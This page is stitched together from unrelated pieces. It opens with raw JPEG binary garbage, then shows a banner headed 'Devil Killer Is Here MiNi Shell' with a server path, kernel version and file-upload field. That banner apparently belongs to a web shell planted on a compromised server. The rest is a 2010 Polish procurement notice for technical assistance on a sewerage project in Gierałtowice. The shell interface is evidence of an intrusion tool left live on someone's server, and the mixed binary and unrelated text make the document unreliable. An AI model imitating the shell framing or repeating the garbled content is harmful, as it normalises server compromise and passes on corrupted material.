JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100810/244700-N-2010.html

<p class="kh_header"><b>Przyszowice: Pomoc Techniczna dla JRP realizującej projekt pn. Kanalizacja  sanitarna  wraz z oczyszczalnią ścieków w Gminie Gierałtowice współfinansowanego z Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko</b><br>
<b>Numer ogłoszenia: 244700 - 2010; data zamieszczenia: 10.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. K. Miarki 1, 44-178 Przyszowice, woj. śląskie, tel. 0-32 3011521, faks 0-32 3011526.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgk-przyszowice.biuletyn.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego ze 100% udziałem gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pomoc Techniczna dla JRP realizującej projekt pn. Kanalizacja  sanitarna  wraz z oczyszczalnią ścieków w Gminie Gierałtowice współfinansowanego z Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia.
Przedmiotem zamówienia jest Pomoc Techniczna dla JRP realizującej projekt pn Kanalizacja  sanitarna  wraz z oczyszczalnią ścieków w Gminie Gierałtowice współfinansowanego z Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko.

2. Zamówienie obejmuje: 
2.1. Pomoc techniczną w zakresie przygotowania Jednostki Realizującej Projekt (JRP), działającej w jego strukturze organizacyjnej, do prawidłowego zarządzania, koordynowania i monitorowania wszelkich działań i zadań związanych z realizacją Projektu, zgodnego z obowiązującym prawem i Wytycznymi Instytucji Zarządzających.
       2.2. Przedmiot niniejszego zamówienia stanowi pomoc techniczna w zakresie:
- pomocy w zarządzaniu i wdrażaniu Projektu polegającej w szczególności na: prowadzeniu stałego audytu wewnętrznego Jednostki Realizującej Projekt pod kątem zgodności z przepisami prawa, w szczególności wytycznymi oraz zapisami umowy o dofinansowanie,
- bieżące doradztwo w prowadzeniu inwestycji z dofinansowaniem unijnym w oparciu o RED FIDIC,
- pomocy w zarządzaniu i wdrażaniu Projektu polegającej na działaniach mediacyjnych.

3. Główny przedmiot zamówienia według CPV: 71356200-0.
4.	Informacje o Projekcie
4.1.	Informacje o zadaniach inwestycyjnych, jakie będą realizowane w ramach Projektu
Zamawiający planuje przeprowadzić pięć postępowań o udzielenie zamówienia publicznego na roboty budowlane: na sołectwa Gierałtowice, Przyszowice, Paniówki Chudów oraz budowę oczyszczalni ścieków. 
W sumie ma powstać 88 km nowej sieci kanalizacyjnej oraz oczyszczalnia ścieków o przepustowości Qd = 1820 m3/d.

4.2.	Zarządzanie Projektem
4.2.1. Beneficjent, Podmiot odpowiedzialny za realizację Projektu, Operator
Beneficjentem pomocy w ramach Programu Operacyjnego Infrastruktura i Środowisko jest Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. ul. K. Miarki 1, 44-178 Przyszowice 
Beneficjent jest Zamawiającym w postępowaniach o zamówienia na roboty i usługi, będzie też pełnił funkcje Podmiotu odpowiedzialnego za realizację Projektu (POZR).
Beneficjent będzie Operatorem (eksploatatorem) majątku, jaki powstanie w wyniku realizacji Projektu.
W ramach swojej struktury organizacyjnej Zamawiający powołał Jednostkę Realizującą Projekt (dalej JRP), która będzie realizowała zadania związane z wdrożeniem Projektu. Powołany został też MAO (Measure Authorising Officer), czyli Pełnomocnik ds. realizacji Projektu. W trakcie realizacji Projektu Zamawiający będzie potrzebował doradztwa spoza swoich struktur organizacyjnych. Taką pomoc będzie świadczył Wykonawca Pomocy Technicznej. 
4.2.2	Struktura zarządzania Projektem
Zarządzanie Projektem należy do zadań MAO i JRP.
Zamawiający zobowiązany jest stosować się do instrukcji i Wytycznych IZ i IPZ, i podlega kontroli prowadzonej przez te Instytucje, przez Komisję Europejską oraz inne właściwe polskie i unijne (wspólnotowe) instytucje kontrolujące.
W celu kontrolowania zarządzania, ale również dla wsparcia i pomocy zamawiającym w procesie zarządzania, utworzony został Komitet Monitorujący, w skład którego wchodzą przedstawiciele Komisji Europejskiej, Instytucji Płatniczej (Ministerstwo Finansów), Instytucji Zarządzającej, Instytucji Pośredniczących i Zamawiającego.
4.2.3	Cel bezpośredni Umowy
Celem bezpośrednim Umowy, jaki musi osiągnąć Wykonawca Usług Pomocy Technicznej, jest prawidłowe funkcjonowanie JRP w zakresie efektywnego zarządzania Projektem w tym zarządzania finansowego, oraz koordynowania i monitorowania umów / kontraktów zawartych w ramach Projektu, zgodnie z obowiązującymi przepisami prawa i Wytycznymi Instytucji Zarządzających. Cel ten Wykonawca może osiągnąć min poprzez:
-	opracowanie procedur, ścieżki audytu, które winien stosować personel JRP w procesie koordynacji, monitorowania i zarządzania Projektem; 
-	przegląd i ocenę struktury organizacyjnej JRP w odniesieniu do zadań nałożonych na JRP, a także obowiązków Zamawiającego związanych z realizacją Projektu, a następnie zaproponowanie i wprowadzenie stosownych zmian;
-	szkolenia personelu JRP i Zamawiającego, min. w zakresie zarządzania Projektami i kontraktami, zarządzania i monitorowania finansowego umów / kontraktów i Projektu, monitorowania procesu inwestycyjnego, stosowania PZP;
-	bieżącą pomoc i doradztwo dla JRP podczas realizacji Projektu,
-	bieżący audyt działań finansowych, przygotowanie działań naprawczych dla JRP.

4.2.4	Wyniki, jakie winien osiągnąć Wykonawca
-	Analiza i uzupełnienie funkcjonujących procedur dla JRP których stosowanie w procesie koordynacji, monitorowania i zarządzania Projektem (w tym, wszystkimi umowami / kontraktami zawartymi w ramach Projektu) zapewni wykonanie i wdrożenie Projektu w planowanym terminie i w ramach określonego budżetu 
-	Ustanowienie efektywnych ram operacyjnych JRP dla realizacji zadań wynikających z wdrażania Projektu
-	Przygotowanie personelu JRP i Zamawiającego do prawidłowego i skutecznego wykonywania zadań związanych z realizacją Projektu, w tym dotyczących zarządzania finansowego, działań nadzorczych i monitorowania procesu inwestycyjnego
-	Wdrożenie personelu JRP i MAO.

5.	ZAKRES USŁUG
5.1	Informacje ogólne
Przedmiotem zamówienia są Usługi Pomocy Technicznej w zakresie przygotowania JRP do prawidłowego, skutecznego i zgodnego z obowiązującym prawem i Wytycznymi zarządzania, koordynowania i monitorowania zadań w ramach Projektu z realizacją i wdrożeniem Projektu, jak również prowadzenie stałego audytu i inicjowanie działań naprawczych w sytuacji wystąpienia nieprawidłowości.
JRP jest odpowiedzialna za koordynację działań wszystkich stron zaangażowanych w realizację Projektu oraz za ostateczne wdrożenie Projektu zgodnie z:
-	wymaganiami zawartymi w umowie o dofinansowanie Projektu ze środków Funduszu Spójności;
-	warunkami umów o świadczenie usług i kontraktów na roboty, zawartymi w ramach Projektu;
-	obowiązującym prawem i Wytycznymi.
Wykonawca niniejszej Umowy będzie w pełni odpowiedzialny za zapewnienie prawidłowego funkcjonowania JRP w zakresie efektywnego koordynowania i monitorowania umów / kontraktów zawartych w ramach Projektu oraz właściwego zarządzania finansowego Projektem, zgodnie z obowiązującymi Wytycznymi i przepisami prawa oraz przygotowanie personelu JRP i Zamawiającego do prawidłowego i sprawnego wykonywania wszystkich zadań i obowiązków związanych z realizacją i wdrożeniem Projektu.
W szczególności Wykonawca będzie odpowiedzialny za:
(a)	świadczenie Usług zgodnie z postanowieniami Umowy, terminowo, z należytą troską, skutecznością i starannością, kierując się interesem Zamawiającego, obowiązującymi przepisami i Wytycznymi, oraz zgodnie z przyjętymi zasadami najlepszej praktyki zawodowej oraz wiedzy technicznej, ekonomicznej, prawniczej i innej, które dotyczą przedmiotu Umowy;
(b)	wykonywanie Usług przez należycie wykwalifikowanych Ekspertów, posiadających odpowiednie doświadczenie i kwalifikacje;
(c)	zapewnienie na czas wykonywania Umowy odpowiedniego wsparcia dla Kluczowych Ekspertów, pozwalającego na osiągnięcie celów określonych w Umowie;
(d)	zatrudnienie wystarczającej liczby tłumaczy w przypadku braku znajomości języka polskiego przez Kluczowych Ekspertów, w stopniu umożliwiającym komunikowanie się z personelem JRP;
(e)	zapewnienie zakwaterowania, wynagradzanie Personelu i pokrywanie wszelkich kosztów związanych z transportem Personelu, w tym ewentualnych delegacji polecanych przez Zamawiającego na spotkania z przedstawicielami IZ i/lub IPZ; 
(f)	wyposażenie Personelu Wykonawcy w narzędzia niezbędne dla wykonania Usług objętych niniejszą Umową; 
(g)	świadczenie profesjonalnego doradztwa Zamawiającemu;
(h) 	zachowanie poufności informacji wynikających z wykonywania Umowy, objętych tajemnicą handlową lub zawodową.
5.2.	Działania i zadania Wykonawcy
Opisane w tym punkcie działania i zadania Wykonawcy nie będą ograniczone tylko do wymienionych poniżej. 
O ile nie zostało określone inaczej, podane poniżej terminy liczone są od daty rozpoczęcia Usług przez Wykonawcę w ramach Umowy, a słowa użyte w liczbie pojedynczej oznaczać mogą liczbę mnogą i odwrotnie, w zależności od kontekstu.
5.2.1	Podstawowe działania i zadania Wykonawcy:
(a)	przeanalizowanie dla JRP rozwiązań organizacyjnych oraz procedur zarządzania Projektem i przedstawienie wniosków;
(b)	opracowanie zaleceń w zakresie ścieżki audytu, procedur generowania, przepływu, przetwarzania informacji i danych zawartych w raportach oraz gromadzenia informacji niezbędnych do podejmowania decyzji przez Zamawiającego;
(c)	przygotowanie JRP do prawidłowego zarządzania finansowego Projektem;
(d)	przygotowanie JRP do prawidłowego koordynowania procesu inwestycyjnego (wykonywania robót budowlanych) i działań nadzorczych w ramach procedur wynikających ze stosowania zapisów kontraktowych FIDIC;
(e)	szkolenie personelu JRP, min w zakresie: zarządzania i monitorowania finansowego umów / kontraktów i Projektu; monitorowania procesu inwestycyjnego; stosowania prawa, w szczególności Prawa budowlanego, procedur FIDIC, podatkowego i Pzp; ubezpieczeń, w szczególności w odniesieniu do kontraktów na roboty budowlane; rozwiązywania sporów z wykonawcami; 
(f)	przeprowadzenie stałego audytu wewnętrznego, przygotowanie JRP do audytu zewnętrznego,
(g) 	opracowanie i wdrożenie działań naprawczych wobec wykrytych nieprawidłowości przy prowadzeniu projektu.
5.2.2	Szczegółowe działania Wykonawcy:
5.2.2.1	Analiza struktury organizacyjnej JRP i stosowanych procedur
(a)	dokonanie - na podstawie wymagań określonych w obowiązujących dokumentach, w tym w wymienionych w p. 4.1, oraz wymagań charakterystycznych dla Projektu - przeglądu i oceny: 
-	 	struktury organizacyjnej JRP;
-	 	wyposażenia JRP;
-	 	procedur stosowanych przez JRP i Zamawiającego, jeśli takie procedury JRP i Zamawiający posiadają;
(b)	identyfikacja procedur, jakie mają zastosowanie do prawidłowego funkcjonowania JRP i efektywnej realizacji zadań związanych z realizacją Projektu;
(c)	przygotowanie - na podstawie wyników uzyskanych z przeprowadzonego przeglądu i oceny wymienionych powyżej w podpunktach (a) i (b) - i przedstawienie JRP i Zamawiającemu zaleceń do dokonania zmian w zakresie: struktury organizacyjnej JRP, kwalifikacji i kompetencji personelu JRP, wyposażenia oraz procedur, jakie winny być stosowane przez JRP.
(d)	opracowanie ścieżki audytu wewnętrznego dla JRP
Termin wykonania analizy: 28 dni. Analiza winna zostać przedłożona wraz z raportem początkowym, o którym mowa poniżej w p. 7. Termin wykonania ścieżki audytu: 21 dni od podpisania umowy.
5.2.2.2	Szkolenia
(a)	Wykonawca opracuje szczegółowy harmonogram szkoleń opisanych poniżej w podpunkcie (b) oraz materiały szkoleniowe, o których mowa poniżej w podpunkcie (c) i przedłoży Zamawiającemu do akceptacji w terminie 28 dni. Zamawiający ma prawo zgłosić uwagi do przedłożonych harmonogramów szkoleń, jak i do materiałów szkoleniowych w terminie 21 dni od ich otrzymania. Ostateczne wersje harmonogramu szkoleń (3 egzemplarze) zatwierdzone przez Zamawiającego, oraz materiały szkoleniowe (po 3 egzemplarze z każdego obszaru szkolenia) zostaną przedłożone Zamawiającemu nie później niż 7 dni przed rozpoczęciem szkolenia.
(b)	Szkolenia personelu JRP w liczbie maksymalnie 12 osób przeprowadzone zostaną w zakresie:
-	zarządzania finansowego Projektem i monitorowania finansowego postępu we wdrażaniu Projektu, zgodnie z wymaganiami IZ i IPZ, z wykorzystaniem odpowiedniego oprogramowania dla koordynacji i monitorowania umów / kontraktów;
      Czas trwania: min. 16 godzin. Miejsce: siedziba Zamawiającego.
-	monitorowania rzeczowego postępu we wdrażaniu Projektu, zgodnie z wymaganiami IZ, IPZ i KE, z wykorzystaniem odpowiedniego oprogramowania dla koordynacji i monitorowania umów / kontraktów;
      Czas trwania: min. 8 godzin. Miejsce: siedziba Zamawiającego
-	procedur, jakie winny być stosowane przez JRP w procesie koordynowania, monitorowania i zarządzania Projektem;
      Czas trwania: min. 8 godzin. Miejsce: siedziba Zamawiającego
-	zarządzania kontraktami na roboty opartymi o Warunki Kontraktowe FIDIC, w szczególności w odniesieniu do: zarządzania ryzykiem, zapewnienia jakości, dostosowania Warunków Kontraktowych FIDIC do przepisów prawa polskiego;
      Czas trwania: min. 16 godzin. Miejsce: siedziba Zamawiającego
-	stosowania właściwych systemów i technik w procesie zarządzania projektem, obejmujących:
A.	System kontroli zarządzania;
B.	Schemat programu zarządzania projektem;
C.	Zarządzanie informacyjne;
D.	System kontroli finansowej.
	Czas trwania: min. 24 godziny. Miejsce: siedziba Zamawiającego
-	ubezpieczeń w budownictwie, w szczególności: standardów międzynarodowych stosowanych w tym obszarze; ubezpieczenia Robót, personelu i Sprzętu Wykonawcy według Warunków Kontraktowych FIDIC; wymagań Zamawiającego w odniesieniu do wartości i zakresu ubezpieczenia i polis ubezpieczeniowych; powodowanie szkód w wyniku prowadzenia robót budowlanych (co najmniej 2 analizy przypadku [case study]);
      Czas trwania: min. 8 godziny. Miejsce: siedziba Zamawiającego
-	prawa podatkowego obowiązującego w UE i w Polsce, ze szczególnym uwzględnieniem podatków pośrednich;
                           Czas trwania: min 6 godzin. Miejsce: siedziba Zamawiającego
-	sporządzania raportu końcowego po zakończeniu Projektu, zgodnie z obowiązującymi Wytycznymi do przygotowania raportu końcowego Projektu Funduszu Spójności opracowanymi przez Instytucję Zarządzającą;
      Czas trwania: min 16 godzin. Miejsce: siedziba Zamawiającego
-	procedur rozwiązywania sporów powstałych w wyniku realizacji umów o świadczenie usług i kontraktów na roboty, w tym rozjemstwo i arbitraż według prawa polskiego (co najmniej 2 analizy przypadku);
      Czas trwania: min 16 godzin. Miejsce: siedziba Zamawiającego
-	stosowania Prawa zamówień publicznych, ze szczególnym uwzględnieniem warunków udziału w postępowaniach przetargowych na roboty budowlane i usługi, oraz wyroków Krajowej Izby Odwoławczej;
	      Czas trwania: min. 24 godzin. Miejsce: siedziba Zamawiającego.
Raporty ze szkolenia włączone zastaną do właściwego czasowo raportu kwartalnego Wykonawcy.
(c)	opracowanie materiałów szkoleniowych dla każdego z wymienionych powyżej w podpunkcie (b) obszarów szkolenia;
Termin przekazania materiałów szkoleniowych uczestnikom szkolenia: w dniu sesji szkoleniowej. Liczba podręczników szkoleniowych: równa liczbie osób zgłoszonych do szkolenia.
5.2.2.3	Pomoc i doradztwo dla JRP w procesie planowania, organizacji i zarządzania 
(a)	w zakresie współpracy z Inżynierem i realizacji Kontraktów na Roboty w oparciu o Warunki Kontraktowe FIDIC:
-	opracowanie, w terminie 70 dni, wytycznych i zaleceń dotyczących zarządzania i administrowania Kontraktem na Roboty oraz opracowanie skutecznego systemu identyfikacji i kontroli ryzyka;
-	opracowanie procedur do zastosowania przez JRP przy zatwierdzaniu Raportu Końcowego z zakończenia Kontraktu na Roboty składanego przez Inżyniera, i przedłożenie ich Zamawiającemu wraz z drugim raportem kwartalnym Wykonawcy;
-	pomoc i doradztwo dla JRP i Zamawiającego w zakresie spraw bieżących związanych z realizacją Projektu;
-	pomoc i doradztwo dla JRP i Zamawiającego w rozwiązywaniu sytuacji kryzysowych związanych z realizacją Projektu, obejmujące m.in. opracowanie - na żądanie Zamawiającego - opinii i/lub analiz technicznych, prawnych, finansowych i innych.
(b)	w zakresie monitoringu i sprawozdawczości:
-	analiza istniejących procedur monitorowania, sprawozdawczości (raportowania) i planowania niezbędnych dla właściwego wykonywania zadań przez JRP i Zamawiającego i odpowiednie przeszkolenie personelu JRP w tym zakresie, naniesienie stosownych poprawek;
-	bieżące wsparcie JRP i Zamawiającego w sprawozdawczości (raportowaniu) i planowaniu rzeczowego i finansowego postępu we wdrażaniu Projektu.
Analiza z działań, o których mowa w podpunktach (i) - (ii), sporządzona zostanie przez Wykonawcę w terminie 42 dni i dołączona do pierwszego po tym terminie raportu kwartalnego Wykonawcy. 
(c)	w zakresie zarządzania finansowego Projektem:
	dokonanie przeglądu i oceny istniejącego systemu księgowości w celu stwierdzenia jego zgodności z wymaganiami IZ i IPZ;
-	opracowanie zaleceń, jakie winny być wprowadzone do stosowanego systemu księgowości jako rezultat wspomnianego w podpunkcie (i) przeglądu oraz obowiązujących procedur księgowości do stosowania przez JRP;
-	bieżące doradztwo i pomoc dla JRP w zakresie zarządzania finansowego i księgowości, obejmujące m.in.:
	-	kwalifikowanie wydatków w ramach Projektu, zgodnie z obowiązującymi Wytycznymi;
	-	weryfikacje przez JRP Przejściowych Świadectw Płatności i faktur;
	-	przygotowanie wniosków o płatności pośrednie;
	-	weryfikacje i aktualizacje harmonogramu rzeczowo-finansowego oraz planu płatności. 
-	identyfikowanie (potencjalnych i występujących) zagrożeń dla właściwego wdrażania Projektu w obszarze mechanizmów finansowych, ale także kontrolnych, sprawozdawczości (raportowania) i monitorowania, oraz systemu księgowości dla zadań realizowanych w ramach Projektu;
Analiza z działań, o których mowa w podpunktach c) jw., sporządzona zostanie przez Wykonawcę w terminie 84 dni i dołączona do pierwszego po tym terminie raportu kwartalnego Wykonawcy. 
-	prowadzenie bieżącego i stałego audytu wewnętrznego projektu w tym w szczególności prowadzenie list sprawdzających z zakresu działań finansowych, przetargowych, monitoringu i sprawozdawczości i innych niezbędnych dla prawidłowego prowadzenia projektu.
 (d)	w zakresie innych działań:
-	opracowanie opinii prawnych oraz analiz technicznych i finansowych związanych z realizacją Projektu stanowiących podstawę podejmowanych decyzji przez Zamawiającego - każdorazowo na życzenie Zamawiającego;
-	doradztwo w zakresie zarządzania zmianami w realizowanych kontraktach na roboty i zmniejszenia oddziaływania niekorzystnych czynników w tym potencjalnych zagrożeniach dotyczących jakości, kosztów i terminów realizacji Projektu,
-	pomoc w rozwiązywaniu konfliktów i problemów wynikłych we współpracy JRP z Inżynierem Kontraktu lub Wykonawcą robót budowlanych,
-	pomoc w rozwiązywaniu konfliktów i problemów wynikłych na skutek wejścia Wykonawców robót budowlanych na działki prywatne,
-	udział (w roli eksperta) w naradach koordynacyjnych (naradach technicznych) na Terenie Budowy, w okresowych spotkaniach organizowanych przez Zamawiającego w związku z realizacją Projektu, czy w okresowych spotkaniach instytucji kontrolujących realizację Projektu, każdorazowo na życzenie Zamawiającego.
-	 prowadzanie mediacji w sytuacjach spornych w kontekście działania Inżyniera Kontraktu i Wykonawców robót budowlanych,
-	 wsparcie merytoryczne JRP w zakresie znajomości prowadzenia inwestycji wg. Warunków Kontraktowych RED FIDIC
5.3 	Inne obowiązki Wykonawcy
Niezależnie od zakresu obowiązków określonych powyżej w p. 5.1 i 5.2, do zadań Wykonawcy należy:
(a) 	znajomość wszelkich dokumentów programowych, przepisów, zasad, Wytycznych i ich aktualizacji w zakresie dotyczącym realizacji Projektu współfinansowanego w ramach Programu Operacyjnego Infrastruktura i Środowisko;
(b) 	śledzenie na bieżąco publikacji na stronach internetowych KE, Instytucji Zarządzającej i Instytucji Pośredniczących, Urzędu Zamówień Publicznych i innych instytucji, mających związek z wykonywaniem Usług objętych niniejszą Umową;
(c) 	monitorowanie i stosowanie się na bieżąco do wszelkich zmian dotyczących przepisów, zasad, Wytycznych i dokumentów związanych z realizacją Projektu, oraz bezzwłoczne przekazywanie Zamawiającemu, w formie pisemnej, niezbędnych informacji, opinii i dokumentów dotyczących tych zmian, a także wprowadzanie na bieżąco stosownych zmian do przygotowywanych raportów i innych dokumentów;
5.4	Dodatkowe informacje dotyczące wykonywania Usług 
(a)	Wykonawca zorganizuje prace swojego Personelu w taki sposób, aby zostały osiągnięte cele bezpośrednie określone w Umowie.
(b)	Wykonawca musi informować bezpośrednio i na bieżąco Zamawiającego o problemach, jakie napotyka w trakcie wykonywania Usług.
(c)	Każdorazowo na żądanie Zamawiającego i w ustalonym z nim terminie, Wykonawca opracuje potrzebne Zamawiającemu opracowania, opinie i/lub analizy prawne, techniczne i finansowe związane z realizacją Projektu.
(d)	Konsultacje i doradztwo dla Zamawiającego odbywać się będą na wezwanie Zamawiającego w miejscu przez niego wskazanym. 
(e)	Pomoc Techniczna powinna być świadczona w taki sposób, aby umożliwić personelowi JRP sprostanie wszelkim wymogom, zadaniom i obowiązkom nałożonym przez Zamawiającego, IZ i IPZ w celu prawidłowego i efektywnego wdrożenia Projektu i osiągnięcia założonych celów.
(f)	Cała korespondencja i dokumentacja będą sporządzane w języku polskim. Dokumenty powstałe w wyniku działań i zadań Wykonawcy będą dostarczone w wersji papierowej (drukowanej) i w wersji elektronicznej. Dokumenty w wersji elektronicznej będą dostarczone:
-	grafika	-	w formacie JPG lub TIF;
-	pozostałe dokumenty	-	zgodnie z najnowszym pakietem Microsoft Office.
(g)	Wykonawca ma prawo:
-	proponowania uzasadnionych zmian w strukturze organizacyjnej JRP;
-	proponowania uzasadnionych zmian w składzie personelu JRP;
-	proponowania uzasadnionych zmian dotyczących wszystkich procedur zweryfikowanych przez Wykonawcę w ramach Umowy;
-	dostępu do wszystkich dokumentów składających się na wniosek o dofinansowanie Projektu.
6.	SPRAWOZDAWCZOŚĆ
6.1.	Wymagania dotyczące raportów, analiz, opinii i innych opracowań
Raporty, jakie Wykonawca jest zobowiązany sporządzić w ramach Umowy i terminy, w jakich ma je przedłożyć Zamawiającemu, określone zostały poniżej w p. 6.2.
Informacje o analizach, opiniach i innych opracowaniach, jakie Wykonawca jest zobowiązany sporządzić w ramach Umowy i terminy, w jakich ma je przedłożyć Zamawiającemu, określone zostały powyżej w p. 5. 
Wszystkie raporty będą przedkładane do zatwierdzenia przez Zamawiającego jako projekty raportów. Projekty raportów będą przedkładane w jednym egzemplarzu. Raporty będą sporządzone w formie uzgodnionej z Zamawiającym, a na pierwszych stronach będzie wyraźne stwierdzenie, że Umowa jest współfinansowana ze środków Funduszu Spójności. Wszystkie raporty będą sporządzone w języku polskim.
Powyższe wymagania stosuje się także do analiz, opinii i innych opracowań.
Każdy raport zatwierdzony przez Zamawiającego będzie dostarczony przez Wykonawcę Zamawiającemu w wersji ostatecznej, w czterech egzemplarzach oraz dodatkowo w wersji elektronicznej, w formie zgodnej z wymaganiami Zamawiającego i wytycznymi IZ i IPZ. 
Każdy raport będzie istniał tylko w jednej ostatecznej wersji.
Do raportów i dołączonych do nich dokumentów, oraz do analiz, opinii i innych opracowań, jakie Wykonawca jest zobowiązany sporządzić w ramach Umowy, stosuje się postanowienia Artykułu 9 Umowy.
6.2.	Przedkładanie i zatwierdzanie raportów
W ramach niniejszej Umowy Wykonawca zobowiązany jest złożyć następujące raporty:
(a)	raport początkowy w terminie 28 dni po dacie rozpoczęcia Usług; raport ten winien zawierać min:
-	szczegółową organizację i metodykę wykonywania Usług;
-	szczegółowy harmonogram usług, o którym mowa w Artykule 3.2 Umowy.
